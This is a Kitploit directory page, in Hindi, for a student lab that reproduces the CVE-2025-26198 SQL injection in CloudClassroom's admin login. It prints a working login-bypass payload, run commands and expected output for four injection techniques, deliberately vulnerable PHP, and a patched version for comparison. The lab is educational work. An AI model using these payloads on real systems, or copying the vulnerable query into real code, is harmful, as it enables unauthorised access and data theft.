Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-26198 — CVE-2025-26198 SQL इंजेक्शन का शैक्षणिक पुनरुत्पादन जिसमें चार शोषण तकनीकें (बूलियन, यूनियन, टाइम-बेस्ड, फ़ाइल रीड) और साइबर सुरक्षा शिक्षा के लिए पैच किए गए संस्करण की तुलना शामिल है। | Kitploit
उपकरण/GitHubGitHub/wailyacoubi9/cve-2025-26198
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षाडेटाबेस सुरक्षा
GitHubwailyacoubi9/cve-2025-26198

CVE-2025-26198

CVE-2025-26198 SQL इंजेक्शन का शैक्षणिक पुनरुत्पादन जिसमें चार शोषण तकनीकें (बूलियन, यूनियन, टाइम-बेस्ड, फ़ाइल रीड) और साइबर सुरक्षा शिक्षा के लिए पैच किए गए संस्करण की तुलना शामिल है।

रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-26198 - SQL इंजेक्शन प्रदर्शन

ENSIMAG शैक्षणिक परियोजना - सुरक्षा 3A
लेखक : Wail Yacoubi, Mohammed-Yassine Akhmari
तारीख : जनवरी 2026


चेतावनी

यह कोड जानबूझकर शैक्षणिक उद्देश्यों के लिए कमजोर बनाया गया है।
इसे कभी भी उत्पादन में तैनात न करें।


विवरण

CVE-2025-26198 का पुनरुत्पादन: CloudClassroom-PHP-Project v1.0 में गंभीर SQL इंजेक्शन।

CVE की विशेषताएँ:

  • पहचानकर्ता : CVE-2025-26198
  • CVSS स्कोर : 9.8/10 (गंभीर)
  • प्रकार : SQL इंजेक्शन (CWE-89)
  • कमजोर घटक : loginlinkadmin.php
  • प्रभाव : प्रमाणीकरण बाइपास + पूर्ण डेटाबेस निष्कर्षण

आधिकारिक संदर्भ : https://nvd.nist.gov/vuln/detail/CVE-2025-26198


उद्देश्य

SQL इंजेक्शन की 4 शोषण तकनीकों का प्रदर्शन:

  1. बूलियन-आधारित - प्रमाणीकरण बाइपास
  2. यूनियन-आधारित - डेटा निष्कर्षण
  3. टाइम-बेस्ड ब्लाइंड - विलंब द्वारा पता लगाना
  4. फ़ाइल रीड - सिस्टम फ़ाइलें पढ़ना

स्थापना

आवश्यकताएँ

  • Docker और Docker Compose
  • Python 3.x
  • requests स्थापित करें : pip install requests

प्रारंभ

root@kitploit:~
# क्लोन रिपॉजिटरी
git clone <आपका-रिपो>
cd CVE-2025-26198

# इन्फ्रास्ट्रक्चर लॉन्च करें
docker-compose up -d

# MySQL तैयार होने तक प्रतीक्षा करें (30 सेकंड)
sleep 30

# कंटेनर जाँचें
docker-compose ps

एप्लिकेशन http://localhost:8081 पर उपलब्ध है


शोषण

विधि 1 : मैन्युअल (ब्राउज़र)

  1. http://localhost:8081 पर जाएँ

  2. फॉर्म भरें :

    • उपयोगकर्ता नाम : admin' OR '1'='1'-- -
    • पासवर्ड : anything
  3. लॉगिन पर क्लिक करें

परिणाम : बिना वैध पासवर्ड के एडमिन कनेक्शन सफल।

व्याख्या:

पेलोड SQL क्वेरी को बदल देता है :

root@kitploit:~
-- सामान्य क्वेरी
SELECT * FROM admin WHERE username='admin' AND password=MD5('test')

-- इंजेक्शन के साथ क्वेरी
SELECT * FROM admin WHERE username='admin' OR '1'='1'-- -' AND password=MD5('test')

OR '1'='1' हमेशा सत्य है, और -- - बाकी को टिप्पणी कर देता है।


विधि 2 : Python स्क्रिप्ट्स

सरल स्क्रिप्ट

root@kitploit:~
python exploit_simple.py http://localhost:8081

अपेक्षित आउटपुट :

root@kitploit:~
CVE-2025-26198 - SQL Injection Exploit
==================================================
[*] Target: http://localhost:8081/loginlinkadmin.php
[*] Payload: admin' OR '1'='1'-- -
[+] Exploitation successful
[+] Status Code: 200

पूर्ण स्क्रिप्ट (4 तकनीकें)

root@kitploit:~
python exploit.py http://localhost:8081

अपेक्षित आउटपुट :

root@kitploit:~
============================================================
  CVE-2025-26198 - SQL Injection Exploitation
============================================================

Test 1: Boolean-based Authentication Bypass
[+] Authentication bypass SUCCESSFUL
[+] Admin access obtained without valid credentials

Test 2: Union-based Data Extraction
[*] Detecting number of columns...
[+] Number of columns: 5
[+] Database name: cloudclassroom
[+] MySQL user: [email protected]
[+] MySQL version: 5.7.44
[+] Tables: admin,students
[+] Admin data:
    - admin:[email protected]
    - superadmin:[email protected]

Test 3: Time-based Blind SQL Injection
[*] Response time: 3.05 seconds
[+] Time-based injection CONFIRMED

Test 4: File Read via LOAD_FILE()
[+] File read SUCCESSFUL
[+] FILE privilege confirmed

EXPLOITATION SUMMARY
[✓] Boolean-based (Auth Bypass)
[✓] Union-based (Data Extraction)
[✓] Time-based (Blind Detection)
[✓] File Read (LOAD_FILE)

पैच किया गया संस्करण

तैयार स्टेटमेंट के साथ सुरक्षित संस्करण का परीक्षण करें :

root@kitploit:~
# पैच किए गए संस्करण को सक्रिय करें
mv app/loginlinkadmin.php app/loginlinkadmin_VULNERABLE.php
mv app/loginlinkadmin_PATCHED.php app/loginlinkadmin.php
docker-compose restart web
sleep 3

# एक्सप्लॉइट का पुन: परीक्षण करें
python exploit_simple.py http://localhost:8081

अपेक्षित परिणाम :

root@kitploit:~
[-] Error: Connection aborted
[-] Exploitation failed

इनपुट सत्यापन और तैयार स्टेटमेंट द्वारा हमला अवरुद्ध हो जाता है।

कमजोर संस्करण पुनर्स्थापित करें :

root@kitploit:~
mv app/loginlinkadmin.php app/loginlinkadmin_PATCHED.php
mv app/loginlinkadmin_VULNERABLE.php app/loginlinkadmin.php
docker-compose restart web

संस्करणों की तुलना

कमजोर कोड :

root@kitploit:~
$sql = "SELECT * FROM admin WHERE username='$input_username' AND password=MD5('$input_password')";
$result = $conn->query($sql);

सुरक्षित कोड :

root@kitploit:~
$stmt = $pdo->prepare("SELECT * FROM admin WHERE username = :username AND password = MD5(:password)");
$stmt->bindParam(':username', $input_username, PDO::PARAM_STR);
$stmt->bindParam(':password', $input_password, PDO::PARAM_STR);
$stmt->execute();

परियोजना संरचना

root@kitploit:~
CVE-2025-26198/
├── README.md
├── RAPPORT.md
├── docker-compose.yml
├── app/
│   ├── index.html
│   ├── loginlinkadmin.php          # Version vulnérable
│   ├── loginlinkadmin_PATCHED.php  # Version sécurisée
│   └── sql/
│       ├── init.sql
│       └── grant_file.sql
├── exploit.py
├── exploit_simple.py
└── screenshots/

समस्या निवारण

वेब कंटेनर शुरू नहीं होता

root@kitploit:~
docker-compose logs web
docker-compose down
docker-compose up -d --build

एक्सप्लॉइट काम नहीं करता

root@kitploit:~
# MySQL जाँचें
docker-compose exec db mysql -udbuser -pdbpassword -e "SELECT 1"

# वेब सेवा जाँचें
curl http://localhost:8081

# सक्रिय संस्करण जाँचें
head -n 2 app/loginlinkadmin.php

पोर्ट पहले से उपयोग में है

docker-compose.yml को संशोधित करें :

root@kitploit:~
ports:
  - "8082:80"

दस्तावेज़ीकरण

विस्तृत विश्लेषण के लिए RAPPORT.md देखें जिसमें शामिल है :

  • कमजोरी का तंत्र
  • सिस्टम आर्किटेक्चर
  • सुरक्षा अनुशंसाएँ
  • विकास सर्वोत्तम अभ्यास

संदर्भ

  • आधिकारिक CVE : https://nvd.nist.gov/vuln/detail/CVE-2025-26198
  • मूल परियोजना : https://github.com/mathurvishal/CloudClassroom-PHP-Project
  • OWASP SQL इंजेक्शन : https://owasp.org/www-community/attacks/SQL_Injection
  • PHP PDO : https://www.php.net/manual/en/pdo.prepared-statements.php

अस्वीकरण

यह परियोजना केवल शैक्षणिक उद्देश्यों के लिए ENSIMAG साइबर सुरक्षा पाठ्यक्रम के भाग के रूप में विकसित की गई है।

अनुमत उपयोग :

  • सीखना और प्रशिक्षण
  • अनुमत वातावरण पर परीक्षण

निषिद्ध उपयोग :

  • वास्तविक प्रणालियों पर हमले
  • दुर्भावनापूर्ण उपयोग

शैक्षणिक ढांचे के बाहर कोई भी उपयोग सख्त वर्जित और अवैध है।


लेखक
Wail Yacoubi & Mohammed-Yassine Akhmari
ENSIMAG - बैच 2026
पाठ्यक्रम : सुरक्षा 3A

टूल डाउनलोड करें
पहलूकमजोर संस्करणपैच किया गया संस्करण
SQL क्वेरीसीधा संयोजनPDO तैयार स्टेटमेंट
इनपुट सत्यापनकोई नहींअल्फ़ान्यूमेरिक रीजेक्स
आउटपुट एस्केपिंगनहींhtmlspecialchars()
SQL इंजेक्शनशोषण योग्यअवरुद्ध
लॉगकोई नहींerror_log()